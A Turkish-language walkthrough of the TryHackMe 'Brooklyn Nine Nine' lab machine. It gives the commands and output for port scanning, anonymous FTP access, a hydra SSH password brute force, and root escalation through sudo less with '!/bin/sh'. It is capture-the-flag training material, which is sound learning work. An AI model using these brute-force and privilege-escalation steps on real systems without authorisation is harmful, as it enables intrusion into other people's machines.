TryHackMe – Brooklyn Nine Nine Makine Çözümü

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Brooklyn Nine Nine” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

> nmap -sS -sV 10.10.85.170                                                                                        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 18:35 +03
Nmap scan report for 10.10.85.170
Host is up (0.076s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

2 — “anonymous:anonymous” bilgileri ile FTP servisine giriş yaparak dosyaları indiriyorum.

> ftp 10.10.85.170                                                                                                 
Connected to 10.10.85.170.
220 (vsFTPd 3.0.3)
Name (10.10.85.170:alper): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||30845|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt

3 — txt dosyasını okuduğum zaman “amy” ve “jake” adında iki kullanıcının konuşmalarını görüyorum. Amy kullanıcısı Jake kullanıcısına parolasını değiştirmesini söylüyor. *hydra* aracı ile jake kullanıcısı ile ssh servisine bir saldırı başlatıyorum.

> hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.85.170

*
*
[22][ssh] host: 10.10.85.170   login: jake   password: XXXCENSOREDXXX
*
*

4 — SSH bağlantısından sonra ilk bayrağımı bulmak için find komutunu kullanıyorum. Daha sonra ilgili dizindeki bayrak dosyasını okuyarak ilk bayrağı elde ediyorum.

jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ find / -type f -name "user.txt" 2>/dev/null
/home/holt/user.txt
jake@brookly_nine_nine:~$ cat /home/holt/user.txt
***CENSORED***

5 — “sudo -l” komutu ile sudo yetkisi ile çalıştırabileceğim komutları görüntülüyorum. GTFObins sitesinden “less” komutundaki sudo yetkisini nasıl suistimal edebileceğimi öğreniyorum.

jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less

6 — Less komutu ile herhangi bir dosyayı okuyarak ekran geldiğinde klavyeden “!/bin/sh” yazarak root kullanıcısına geçiyorum. Daha sonra root dizinindeki ikinci bayrağı da elde ederek odayı tamamlıyorum.

jake@brookly_nine_nine:~$ sudo less /etc/profile
# whoami
root
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: ***CENSORED***

Enjoy!!